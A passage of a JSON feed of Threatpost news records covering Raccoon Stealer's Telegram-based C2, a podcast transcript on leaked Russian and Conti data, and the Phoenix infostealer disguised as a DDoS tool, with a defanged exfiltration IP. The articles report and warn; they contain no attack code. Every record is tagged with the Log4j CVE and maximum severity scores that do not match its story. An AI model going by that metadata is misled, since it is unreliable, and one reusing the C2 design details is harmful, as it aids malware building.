such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T13:52:37", "type": "threatpost", "title": "Cybercrooks\u2019 Political In-Fighting Threatens the West", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T13:52:37", "id": "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "href": "https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:13:04", "description": "A credential stealer that first rose to popularity a couple of years ago is now abusing Telegram for command-and-control (C2). A range of cybercriminals continue to widen its attack surface through creative distribution means like this, researchers have reported.\n\n[Raccoon Stealer](<https://threatpost.com/malwarebytes-copycat-site-raccoon-stealer/154638/>), which first appeared on the scene in April 2019, has added the ability to store and update its own actual C2 addresses on Telegram\u2019s infrastructure, according to a blog post published by [Avast Threat Labs](<https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/>) this week. This gives them a \u201cconvenient and reliable\u201d command center on the platform that they can update on the fly, researchers said.\n\nThe malware \u2013 believed to be developed and maintained by Russia-affiliated cybercriminals \u2013 is at its core a credential stealer but is capable of a range of nefarious activity. It can steal not only passwords but also cookies, saved logins and forms data from browsers, login credentials from email clients and messengers, files from crypto wallets, data from browser plugins and extensions, and arbitrary files, based on commands from its C2.\n\n\u201cIn addition, it\u2019s able to download and execute arbitrary files by command from its C2,\u201d Avast Threat Labs researcher [Vladimir Martyanov](<https://decoded.avast.io/author/vladimirmartyanov/>) wrote in the post. This, in combination with active development and promotion on underground forums, makes Raccoon Stealer \u201cprevalent and dangerous,\u201d he said.\n\nUpon its release in 2019, cybercriminals [quickly adopted](<https://threatpost.com/raccoon-malware-steal-data/149525/>) the malware because of its user-friendly malware-as-a-service (MaaS) model, which has given them a quick and easy way to make money by stealing sensitive data.\n\n## **Creative Distribution**\n\nEarly on, attackers were seen delivering Raccoon Stealer [via an .IMG file](<https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/>) hosted on a hacker-controlled Dropbox account in business email compromise (BEC) campaigns that targeted financial institutions and other organizations.\n\nMore recently, Avast Threat Labs researchers observed a number of new and creative ways attackers are distributing Raccoon Stealer, Martyanov said.\n\n\u201cTaking into account that Raccoon Stealer is for sale, its distribution techniques are limited only by the imagination of the end buyers,\u201d he wrote.\n\nIn addition to being spread by two loaders \u2013 Buer Loader and GCleaner \u2013 attackers also are distributing Raccoon Stealer via fake game cheats, patches for cracked software \u2013 including hacks and mods for Fortnite, Valorant and NBA2K22 \u2013 or other software, Martyanov wrote.\n\nCybercriminals also are taking care to try to evade detection by packing the credential stealer, using Themida or malware packers, with some samples observed being packed more than five times in a row with the same packer, he added.\n\n## **Abusing C2 in Telegram**\n\nThe report detailed how the latest version of Raccoon Stealer communicates with C2 within Telegram: There are four \u201ccrucial\u201d values for its C2 communication, which are hardcoded in every Raccoon Stealer sample, according to the post. They are:\n\n * -MAIN_KEY, which has been changed four times during the year;\n * -URLs of Telegram gates with a channel name;\n * -BotID, a hexadecimal string, sent to the C2 every time; and\n * -TELEGRAM_KEY, a key to decrypt the C2 address obtained from Telegram Gate.\n\nTo hijack Telegram for its C2, the malware first decrypts MAIN_KEY, which it uses to decrypt Telegram gates URLs and BotID. The stealer then uses Telegram gate to get to its real C2 using a string of queries that eventually allow it to use the Telegram infrastructure to store and update actual C2 addresses, Martyanov wrote.\n\nBy downloading and executing arbitrary files from a command from C2, the stealer also is able to distribute malware. Avast Threat Labs collected about 185 files, with a total size of 265 megabytes \u2013 including downloaders, clipboard crypto stealers and the WhiteBlackCrypt ransomware \u2013 that were being distributed by Raccoon Stealer.\n\n## **Avoiding Russian Entities**\n\nOnce executed, Racoon Stealer starts checking for the default user locale set on the infected device and won\u2019t work if it\u2019s one of the following: Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik or Uzbek. This is likely because the developers themselves are Russian, researchers believe.\n\nHowever, Avast Threat Labs found that in recent activity, \u201cthe country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don\u2019t want to infect computers in Russia or Central Asia,\u201d Martyanov wrote.\n\nThis could be because \u201cthe attacks spray and pray, distributing the malware around the world,\u201d he noted. The malware doesn\u2019t check for the location of the user until it actually reaches a device; if it finds that the device is located in a region developers don\u2019t want to target, it won\u2019t run.\n\n\u201cThis explains why we detected so many attack attempts in Russia; we block the malware before it can run, i.e. before it can even get to the stage where it checks for the device\u2019s locale,\u201d Martyanov wrote. \u201cIf an unprotected device that comes across the malware with its locale set to English or any other language that is not on the exception list but is in Russia, it would still become infected.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T15:03:20", "type": "threatpost", "title": "Raccoon Stealer Crawls Into Telegram", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T15:03:20", "id": "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "href": "https://threatpost.com/raccoon-stealer-telegram/178881/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been pouring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:****** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you. \u201cExcept for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia: **As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologin was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehouse is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil. that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinnie, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T14:53:17", "description": "Looking to cyber-hassle Russia, Ukrainian sympathizers? Be careful \u2014 malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.\n\nIn a Wednesday [threat advisory](<https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html>), Cisco Talos described a campaign it\u2019s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram, that\u2019s purportedly meant to pummel Russian websites.\n\nIn truth, the file is actually the Phoenix infostealer that\u2019s after credentials and cryptocurrency info, according to researchers.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\nResearchers shared one such Telegram come-on, shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg>)\n\nInfostealer disguised as a Russian attack tool on Telegram. Source: Cisco Talos.\n\n\u201cWe are glad to remind you about the software we use to attack Russian sites!\u201d the message burbled, waiting to jump on unsuspecting users so as to bleed them of cryptocurrency stored in wallets and MetaMask (a cryptocurrency wallet software commonly associated with non-fungible tokens [NFTs]).\n\n## Cyber-Warzone Flooded with New Threats, Hacker Newbies\n\nThe malware dressed in sheep\u2019s clothing is just one more wrinkle in the cyber-threat landscape \u2013 a landscape that been undergoing seismic shifts leading up to and during Russia\u2019s invasion of Ukraine. The crisis has brought both new threats and an influx of actors \u201cof varying skill,\u201d Cisco said.\n\nFor example, the cyber-warzone has entailed the Conti ransomware gang\u2019s secrets [getting spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) (including a [decryptor and TrickBot code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>)) by a Ukrainian security researcher (per [KrebsOnSecurity](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>), citing Alex Holden, the Ukrainian-born founder of the Milwaukee-based cyber intelligence firm Hold Security), a pro-Ukrainian member; furious phishing campaigns [launched](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) against Ukraine and [those aiding](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) Ukrainian refugees; the novel FoxBlade [trojan;](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) DDoS [attacks](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against Ukraine\u2019s military and economy; campaigns using multiple destructive [wipers;](<https://threatpost.com/destructive-wiper-ukraine/177768/>) hackers affiliating themselves with the Anonymous collective [hijacking](<https://www.taiwannews.com.tw/en/news/4466470>) Russian cameras; and more.\n\n\u201cMany of these changes have been brought about by the rise in attacks being[ outsourced](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) to sympathetic people on the internet, which brings about its own unique challenges and threats,\u201d Cisco [outlined](<https://blog.talosintelligence.com/2022/03/ukraine-update.html>). The threat advisory referenced a [tweet](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) exhorting people to join an IT army to fight on the cyber-front.\n\n> We are creating an IT army. We need digital talents. All operational tasks will be given here: <https://t.co/Ie4ESfxoSn>. There will be tasks for everyone. We continue to fight on the cyber front. The first task is on the channel for cyber specialists.\n> \n> \u2014 Mykhailo Fedorov (@FedorovMykhailo) [February 26, 2022](<https://twitter.com/FedorovMykhailo/status/1497642156076511233?ref_src=twsrc%5Etfw>)\n\nSoldiers on the frontlines get shot at, of course, and soldiers on the cyber-frontlines run the risk of getting arrested. After all, no matter how noble the hacking cause, it\u2019s still potentially illegal, Cisco pointed out.\n\n## \u2018Legitimate\u2019 Disbalancer Liberator DDoS Tool\n\nThe malware in the Telegram message brands itself as a \u201cDisbalancer\u201d .ZIP file. There is, in fact, a group called \u201cdisBalancer\u201d that distributes a \u201clegitimate\u201d DDoS attack tool called, ironically enough, Liberator, Cisco found \u2013 a tool for waging cyberwar against \u201cRussian propaganda websites.\u201d\n\n\u201cA quick look at disBalancer\u2019s website shows that the actor uses similar language to the malicious message on Telegram\u2026and promises to target Russian sites with the stated goal of helping to \u2018liberate\u2019 Ukraine,\u201d according to Cisco\u2019s writeup.\n\nThe security company offered a screenshot of the brandjacking Disbalancer Liberator website, shown below. As Cisco pointed out, there\u2019s a typo in the group\u2019s name, which is rendered as \u201cdisBalancher.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png>)\n\nScreenshot from Disbalancer Liberator website. Source: Cisco Talos.\n\ndisBalancer\u2019s tool \u2013 Disbalancer.exe \u2013 is sincerely meant to DDoS Russia. The infostealer campaign, on the other hand, is based on a dropper disguised as that tool. It\u2019s protected with ASProtect, Cisco said, a known packer for Windows executables.\n\n\u201cIf a researcher tries to debug the malware execution, it will be confronted with a general error. The malware, after performing the anti-debug checks, will launch Regsvcs.exe, which is included along with the .NET framework,\u201d according to the writeup. \u201cIn this case, the regsvcs.exe is not used as a living off the land binary (LoLBin). It is injected with the malicious code, which consists of the Phoenix information stealer.\u201d\n\nThe actors behind this campaign aren\u2019t the newbies flocking to the front lines. Rather, evidence shows that they\u2019ve been distributing infostealers since at least November, Cisco said, as evidenced by the fact that the infostealer exfiltrates stolen info to a remote IP address \u2013 in this case, a Russian IP \u2014 95[.]142.46.35 \u2014 on port 6666.\n\nThat IP/port pair \u201chas been distributing infostealers since at least November 2021,\u201d researchers said. The longevity of the pairing enforces researchers\u2019 belief that these are experienced actors at work, taking advantage of the Ukraine calamity, rather than threat actors new to the scene.\n\nThe infostealer is hoovering up a broad array of information, Cisco said. \u201cThe .ZIP file provided in the Telegram channel contains an executable, which is the infostealer,\u201d according to the report. \u201cThe infostealer gathers information from a variety of sources, including web browsers like Firefox and Chrome and other locations on the filesystem for key pieces of information.\u201d\n\nThe researchers provided a deobfuscated screen capture, replicated below, showing how the pilfered info is sent with a simple base64 encoding. The screen grab shows the breadth of information being pulled off of infected systems, including a large number of crypto wallets and information on MetaMask. \u201cA .ZIP file of the stolen data is also uploaded to the server, completing the compromise,\u201d Cisco said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png>)\n\nSample data exfiltrated to server. Source: Cisco Talos.\n\n## Don\u2019t Eat That: You Don\u2019t Know Where It\u2019s Been\n\nThe infostealer masquerading as a DDoS tool to attack Russian targets is just one example of the many ways cybercriminals are milking the invasion for social-engineering sustenance, exploiting sympathizers on both sides. \u201cSuch activity could take the form of themed email lures on news topics or donation solicitations, malicious links purporting to host relief funds or refugee support sites, malware masquerading as security defensive or offensive tools, and more,\u201d researchers suggested.\n\nIn this case, cybercriminals were distributing an infostealer in an apparently profit-motivated campaign. It could have been worse, though, according to the report: \u201cIt could have just as easily been a more sophisticated state-sponsored actor or privateer group doing work on behalf of a nation-state.\u201d\n\nExpect this type of situational exploitation to continue and to diversify, Cisco predicted: \u201cThe global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations.\u201d\n\nCisco reminded users to essentially avoid eating food that\u2019s been dropped on the floor. You don\u2019t know where that stuff\u2019s been, researchers warned, so be wary of installing software \u201cwhose origins are unknown, especially software that is being dropped into random chat rooms on the internet.\u201d\n\nAs always, carefully inspect suspicious emails before opening attachments, Cisco advised, and validate software or other files before downloading.\n\n031122 0934 UPDATE: Corrected identification of Conti leaker.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top 